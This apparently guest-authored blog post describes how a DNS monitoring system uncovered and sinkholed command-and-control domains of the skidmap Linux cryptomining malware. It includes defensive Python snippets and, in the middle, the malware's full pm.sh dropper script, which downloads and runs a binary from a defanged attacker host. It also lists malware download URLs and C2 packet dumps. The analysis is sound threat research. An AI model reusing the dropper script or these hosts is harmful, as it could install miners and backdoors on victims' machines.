Skidmap and malicious DNS data mining

By Zaifeng Zhang on 19 Apr 2021

Tags: DNSSEC, Guest Post, Malware, measurement, security

As the foundation and core protocol of the Internet, the DNS protocol carries data that, to a certain extent, reflects a good deal of user behaviour, so security analysis of DNS queries can uncover malicious activities.

Domain generation algorithms (DGA) and fast flux were early examples of malicious threats detected in the DNS. Although the specific methods for detecting these two types of malicious behaviour vary, the core of the detection is still based on pure DNS data. The main reason is that the key features of both types of behaviour are evident in the DNS itself, so little or no external data is needed for fast and accurate detection.
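
As a rough illustration of why such names can stand out in pure DNS data, the sketch below computes the Shannon entropy of a single domain label. The function name and the two example labels are assumptions made for illustration only, and a real detector would combine many more features than this one.

```python
import math
from collections import Counter

def label_entropy(label: str) -> float:
    """Shannon entropy (bits per character) of a single DNS label."""
    if not label:
        return 0.0
    counts = Counter(label.lower())
    total = len(label)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

# Hypothetical labels: one dictionary-like, one random-looking.
for name in ("google", "xk2q9vbz7tplw4"):
    print(name, round(label_entropy(name), 2))
```

Random-looking labels tend to score higher than dictionary-like ones, but entropy alone produces false positives, which is one reason additional data is useful.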

In reality, however, the traces left by malware in DNS queries vary greatly depending on the purpose and environment (one example is the implementation of protocol stacks across OSes), making it difficult or impossible to efficiently complete the closed loop of data cleansing, aggregation, detection, verification, and defence by relying on DNS queries alone.

In the face of massive amounts of DNS data (and other basic data), big data analytics can produce many anomalous clues. Of course, producing accurate threat intelligence from that analysis is another story.

With today’s rapid development of data, computing power, and machine intelligence algorithms, we believe that one of the future directions in DNS security is the correlation and integration of massive amounts of DNS base data with other multi-dimensional data, which can lead to more in-depth and sophisticated analysis.

Using the DNSMon system

The 360Netlab team has been dedicated to DNS data security for six years, starting with the establishment of the first Passive DNS system in China in 2014. DNSMon draws on that experience to systematically analyse hundreds of billions of DNS queries every day and produce threat intelligence in the form of domain name Indicators of Compromise (IOCs), giving end users a platform for security defence.

DNSMon has been running for nearly three years. This is how it works:

DNSMon cross-references the massive volume of DNS queries with the security-related data owned by 360Netlab (including whois, web, sandbox, honeypot, certificates, and similar), and analyses them to derive threat intelligence IOCs.
The system actively blocks high-risk domain names on a large scale, by generating block lists with thousands of malicious and highly suspicious domain names every day, serving about 20 million users in China.

In operating DNSMon, we have learnt that it is common for the domains we intercept to take weeks or even months to enter other threat intelligence (domain name IOC) vendor lists.

In this article, we look at the first example, the skidmap malicious mining program. We will follow up with a series of articles and selected case studies that illustrate how to start with DNS queries and combine them with multi-dimensional data to produce domain name IOCs.

DNSMon’s blocking of unknown domains

In May 2019, a built-in algorithm in DNSMon started to block three subdomains of ipfswallet[.]tk (rctl-443, rctl, and pm) as well as rctl-443.onlinetalk[.]tk. In November 2019, the rctl and info subdomains of onlinetalk[.]tk were also blocked. In September and October 2020, similar interceptions were performed on the rctl-443 and rctl subdomains of googleblockchaintechnology[.]com, howoldareyou999[.]com, and franceeiffeltowers[.]com. The blocking information is shown in the following figure.

These domain names have strong similarities in domain name structure and the choice of subdomains. Further analysis of the behavioural pattern of their DNS requests shows that there is a very high degree of consistency. The graph below shows the access history of the domain names in question since August 2019.

Figure 2 — Access history of the domain names.
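
The structural similarity noted above can be approximated by comparing which subdomain labels each registered domain uses. This is a minimal sketch and not DNSMon's algorithm: the helper names and the naive two-label split for the registered domain are assumptions. The input names are the blocked names listed in this article.

```python
from collections import defaultdict

def refang(name: str) -> str:
    """Undo '[.]' defanging so the name can be split on dots."""
    return name.replace("[.]", ".").lower()

def subdomain_sets(fqdns):
    """Map each registered domain to the set of subdomain labels seen under it.

    Assumption: the registered domain is the last two labels, which holds
    for the .tk and .com names here but not for suffixes such as .co.uk.
    """
    groups = defaultdict(set)
    for fqdn in fqdns:
        labels = refang(fqdn).split(".")
        groups[".".join(labels[-2:])].add(".".join(labels[:-2]))
    return dict(groups)

def jaccard(a: set, b: set) -> float:
    """Jaccard similarity of two sets (1.0 means identical)."""
    return len(a & b) / len(a | b) if a | b else 1.0

blocked = [
    "rctl-443.ipfswallet[.]tk", "rctl.ipfswallet[.]tk", "pm.ipfswallet[.]tk",
    "rctl-443.onlinetalk[.]tk", "rctl.onlinetalk[.]tk", "info.onlinetalk[.]tk",
    "rctl-443.googleblockchaintechnology[.]com",
    "rctl.googleblockchaintechnology[.]com",
]
sets = subdomain_sets(blocked)
print(jaccard(sets["ipfswallet.tk"], sets["onlinetalk.tk"]))
```

A high overlap in subdomain labels across otherwise unrelated registered domains is only a hint; the request-pattern and infrastructure evidence described in the article is what confirms the link.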

Graphical association

In general, if domain names are similar in structure and use the same infrastructure, they are likely to serve similar functions. We therefore analysed the infrastructure and associations of these automatically blocked domains using the graph system developed by 360Netlab to perform graph correlation analysis on multi-dimensional data.

Figure 3 — Analysing the infrastructure and associations of automatically blocked domains, using the graph system.

In Figure 3 we can see that:

All queried domains (the pentagram nodes in the second column) can be correlated with each other via IPs, URLs, and samples, indicating that they do share the same infrastructure.
Some new nodes are also expanded. Among them, pm.cpuminerpool[.]com, hxxp://pm.ipfswallet[.]tk/miner2, and hxxp://pm.ipfswallet[.]tk/miner have distinct characteristics of mining domains, and the related sample nodes are associated with shell scripts and ELF samples that perform mining functions.
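
The kind of correlation described above can be sketched as finding connected components in a graph whose nodes are domains, IPs, and samples. This is not the 360Netlab graph system: the IP addresses (taken from the 192.0.2.0/24 documentation range), the sample identifier, and the `unrelated.example` node are placeholders invented for illustration, not observed data.

```python
from collections import defaultdict, deque

def connected_components(edges):
    """Group the nodes of an undirected graph into connected components (BFS)."""
    adjacency = defaultdict(set)
    for a, b in edges:
        adjacency[a].add(b)
        adjacency[b].add(a)
    seen, components = set(), []
    for start in adjacency:
        if start in seen:
            continue
        queue, component = deque([start]), set()
        seen.add(start)
        while queue:
            node = queue.popleft()
            component.add(node)
            for neighbour in adjacency[node] - seen:
                seen.add(neighbour)
                queue.append(neighbour)
        components.append(component)
    return components

# Placeholder edges: the IPs and the sample ID are hypothetical.
edges = [
    ("rctl.ipfswallet[.]tk", "ip:192.0.2.10"),
    ("rctl.onlinetalk[.]tk", "ip:192.0.2.10"),
    ("pm.ipfswallet[.]tk", "ip:192.0.2.10"),
    ("pm.ipfswallet[.]tk", "sample:placeholder-a"),
    ("pm.cpuminerpool[.]com", "sample:placeholder-a"),
    ("unrelated.example", "ip:192.0.2.99"),
]
for component in connected_components(edges):
    print(sorted(n for n in component if not n.startswith(("ip:", "sample:"))))
```

Domains that end up in the same component share at least one chain of common artefacts, which is the sense in which previously unseen nodes get pulled into the picture.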

Domain associations

According to the September 2019 Trend Micro report, the two expanded sets of domain names in the graph above both belong to the skidmap malicious mining program.

From this, it is almost certain that the rctl series of domain names is closely related to the skidmap mining program. DNSMon blocked the domain names related to skidmap (including the main download domain name pm.ipfswallet[.]tk) about four months before the Trend Micro report (May 2019 versus September 2019).

URL association

After the analysis of graph correlation and domain association, we can determine that the emerging domain names are very closely related to the skidmap malicious mining program. In order to further determine the functionality of these new domains, we spliced the old URLs with the new domains to check if the new domains are taking over the functionality of the corresponding old domains. As it turns out, the corresponding malware can be successfully downloaded.

hxxp://rctl.googleblockchaintechnology[.]com/pc
hxxp://rctl.googleblockchaintechnology[.]com/pm.sh
hxxp://rctl.googleblockchaintechnology[.]com/miner2
hxxp://rctl.googleblockchaintechnology[.]com/miner
hxxp://rctl.googleblockchaintechnology[.]com/cos6.tar.gz
hxxp://rctl.googleblockchaintechnology[.]com/cos7.tar.gz
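
The splicing step can be sketched as combining every new host with every known path. This is a minimal illustration that only builds defanged strings and fetches nothing; the function name is an assumption, and the paths are those of the URLs listed above.

```python
# Paths taken from the URLs listed in this article.
OLD_PATHS = ["/pc", "/pm.sh", "/miner2", "/miner", "/cos6.tar.gz", "/cos7.tar.gz"]

def candidate_urls(hosts, paths, scheme="hxxp"):
    """Combine every new host with every known path, keeping the output defanged."""
    return [f"{scheme}://{host}{path}" for host in hosts for path in paths]

new_hosts = ["rctl.googleblockchaintechnology[.]com"]
for url in candidate_urls(new_hosts, OLD_PATHS):
    print(url)
```

Any actual retrieval of such URLs belongs in an isolated analysis environment.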

The downloaded samples are largely the same as those analysed in the Trend Micro article, which were obtained via the main download domain pm.ipfswallet[.]tk. For example, the contents of pm.sh are as follows:

PATH=$PATH:/usr/bin:/bin:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin

cd /var/lib


if [ -x "/usr/bin/md5sum" -o -x "/bin/md5sum" ];then
    sum=`md5sum pc|grep 42d271982608bd740bf8dd3458f79116|grep -v grep |wc -l`
    if [ $sum -eq 1 ]; then
        chmod +x /var/lib/pc
        /var/lib/pc
        exit 0
    fi
fi

/bin/rm -rf /var/lib/pc
if [ -x "/usr/bin/wget"  -o  -x "/bin/wget" ]; then
   wget -c hxxp://pm.cpuminerpool[.]com/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc
elif [ -x "/usr/bin/curl"  -o  -x "/bin/curl" ]; then
   curl -fs hxxp://pm.cpuminerpool[.]com/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc
elif [ -x "/usr/bin/get"  -o  -x "/bin/get" ]; then
   get -c hxxp://pm.cpuminerpool[.]com/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc
elif [ -x "/usr/bin/cur"  -o  -x "/bin/cur" ]; then
   cur -fs hxxp://pm.cpuminerpool[.]com/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc
elif [ -x "/usr/bin/url"  -o  -x "/bin/url" ]; then
   url -fs hxxp://pm.cpuminerpool[.]com/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc
else
   rpm -e --nodeps wget
   yum -y install wget
   wget -c hxxp://pm.cpuminerpool[.]com/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc
fi
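
From a defender's point of view, the MD5 value that pm.sh checks can serve as a simple host indicator. The sketch below is an assumption-laden illustration rather than part of the original analysis: the function names are hypothetical, and a match only means a file has the same MD5 as the payload the script expects.

```python
import hashlib
from pathlib import Path

# MD5 value that pm.sh compares against before running /var/lib/pc.
KNOWN_PC_MD5 = "42d271982608bd740bf8dd3458f79116"

def md5_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hex MD5 digest of a file, read in chunks to bound memory use."""
    digest = hashlib.md5()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def matches_known_payload(path: Path) -> bool:
    """True if the path is a regular file whose MD5 equals the value in pm.sh."""
    return path.is_file() and md5_of(path) == KNOWN_PC_MD5

print(matches_known_payload(Path("/var/lib/pc")))
```

Because skidmap ships a rootkit that hides files, a negative result from a check run on a live, possibly infected system proves little; offline inspection of the disk is more reliable.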

Data from sinkhole

The two new rctl domain names (howoldareyou999[.]com and franceeiffeltowers[.]com) had not been registered by the malware author, yet we already saw a significant amount of DNS request traffic for them across the network. To find out what these domains are actually used for, we registered one of them, franceeiffeltowers[.]com, and sinkholed it.

In the actual traffic to franceeiffeltowers[.]com, we observed the following characteristics:

Communication via port 443.
A TLS handshake is required, but the client does not verify the certificate of the domain it connects to (the certificate we served does not match the sinkhole domain).
After the TLS handshake, the first packet received has a payload of 39 bytes and looks like the following (the byte content varies between client sources):

00000000: 64 65 66 61 75 6C 74 00  00 00 00 00 00 00 00 00  default.........
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000020: 00 00 16 3E 12 AE AD                              ...>...

Or something like this:

00000000: 63 34 00 00 00 00 00 00  00 00 00 00 00 00 00 00  c4..............
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000020: 00 52 54 00 B8 EB E1                              .RT....

Instead of the readable HTTP URL and the rest of the HTTP exchange that we would expect to see, this content is a connection request to a C2 remote control server.
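
To make the two dumps easier to compare, the sketch below splits the 39-byte payload into a leading text field and the remaining bytes. The split into a 33-byte NUL-padded name field followed by six trailing bytes is an assumption read off the two dumps above, not a documented layout, and the function name is hypothetical.

```python
PACKET_LEN = 39       # payload length reported in the article
NAME_FIELD_LEN = 33   # assumption: NUL-padded text field inferred from the dumps

def parse_first_packet(payload: bytes):
    """Return (name, trailing bytes as hex) for a 39-byte first packet."""
    if len(payload) != PACKET_LEN:
        raise ValueError(f"expected {PACKET_LEN} bytes, got {len(payload)}")
    name = payload[:NAME_FIELD_LEN].split(b"\x00", 1)[0]
    tail = payload[NAME_FIELD_LEN:]
    return name.decode("ascii", errors="replace"), tail.hex()

# The two payloads shown in the hex dumps above.
sample_default = bytes.fromhex("64656661756c74" + "00" * 27 + "163e12aead")
sample_c4 = bytes.fromhex("6334" + "00" * 31 + "525400b8ebe1")

print(parse_first_packet(sample_default))
print(parse_first_packet(sample_c4))
```

Under this reading, the text field is the same for many clients while the trailing bytes differ per client, which fits the remark that the content varies between sources.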

On 13 November 2020, we observed 689 source IP addresses, 64% of which were concentrated in Aliyun and Tencent Cloud, as shown in Figure 4:

Figure 4 — Client and cloud distribution.

Because the rctl domains (whether registered or not) show very similar request patterns, and DNSMon sees them queried together very consistently, we have good reason to believe that the registered domain name (googleblockchaintechnology[.]com) has the same client-side origin as the sinkhole domain name.

The sinkhole server received a total of 936,000 go-live requests (39-byte binary packets) in 24 hours, as shown in Figure 5.

Figure 5 — Go-live requests between 23:00 on 13 November 2020 and 23:00 on 14 November 2020.

Finding answers

From the various correlations mentioned above, it is almost certain that the rctl series of domain names is related to the skidmap malicious mining program. However, the sinkhole data shows that the rctl domains play a different role from the skidmap-related domain name IOCs disclosed so far.

To find the real source of this traffic, we ran a fresh skidmap ‘infection’ in a restricted environment. Unsurprisingly, we saw requests for the rctl series of domains, and they originated from /usr/bin/irqbalanced (ad303c1e121577bbe67b4615a0ef58dc5e27198b). This program constantly tries to resolve the rctl* domains, and we also noticed that rctl-related strings appear in the hidden directory list of skidmap’s rootkit.

About ‘irqbalanced’

In a standard Linux system, irqbalance (location: /usr/sbin/irqbalance) is a service used to balance interrupts and improve performance. It does not issue any suspicious network requests to the outside.

The irqbalanced (location: /usr/bin/irqbalanced) mentioned above is part of the malicious program. It uses a similar name to confuse the analyst, and will communicate with the C2 server of the malicious program.
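
The naming trick can be illustrated with a check that flags file names that are a near-miss of a known system binary. This is a hedged sketch: the function names, the single-entry allow list, and the edit-distance threshold of 1 are assumptions chosen for the example, not a detection rule from the original analysis.

```python
def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance via the classic dynamic-programming recurrence."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        current = [i]
        for j, cb in enumerate(b, start=1):
            current.append(min(
                previous[j] + 1,               # delete a character from a
                current[j - 1] + 1,            # insert a character into a
                previous[j - 1] + (ca != cb),  # substitute (free if equal)
            ))
        previous = current
    return previous[-1]

# Legitimate binary and its location as stated in the article.
LEGITIMATE = {"irqbalance": "/usr/sbin/irqbalance"}

def looks_like_impostor(path: str, max_distance: int = 1) -> bool:
    """True if the file name is close to, but not equal to, a known binary name."""
    if path in LEGITIMATE.values():
        return False
    name = path.rsplit("/", 1)[-1]
    return any(0 < edit_distance(name, legit) <= max_distance for legit in LEGITIMATE)

print(looks_like_impostor("/usr/bin/irqbalanced"))
```

A name-based heuristic like this will also flag harmless files, so it is best treated as a prompt for closer inspection rather than a verdict.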

Analysis of the program revealed that it is derived from an open source remote control tool called ‘rctl’, with the client modified to fit skidmap’s needs. (Because the tool is open source, its author and the actor behind skidmap should not be assumed to be the same person.) However, the core communication protocol did not change, and the initial 39-byte packet received by the sinkhole was the first packet of a victim’s attempt to connect to the C2 master.

Since there was no significant change in the communication protocol, we modified the rctl server software slightly and, as expected, received numerous messages from victims after running the server on the sinkhole server.

Figure 6 — The console can perform batch remote command execution and single shell login for victims.

Figure 7 — Nearly 900 clients connected shortly after the server started, but the actual figure is probably much higher.

The connection efficiency of the remote control software is very high, with nearly 900 clients connected shortly after the server started. Considering the order in which clients request the master domain name when connecting, the real number of victims is probably much higher than this.

Complementing existing threat intelligence

We already know that through careful analysis of DNS data we can find various known and unknown threats. We have learnt that by cross-checking security related data we can intercept suspicious activities.

We have also shown that the IOCs generated by DNSMon are of great value to users with relatively high security requirements, and are a good complement to the existing threat intelligence generated based on traditional security analysis methods.

As mentioned earlier, we will follow up with another article covering the infection process, including the vulnerabilities skidmap uses to gain access to the victim, the malicious programs (rootkits) that it downloads, the functions of each malicious program, and more.

This post was adapted from NetLab 360 Blog.

Zhang Zaifeng is a malware researcher at NetLab 360.

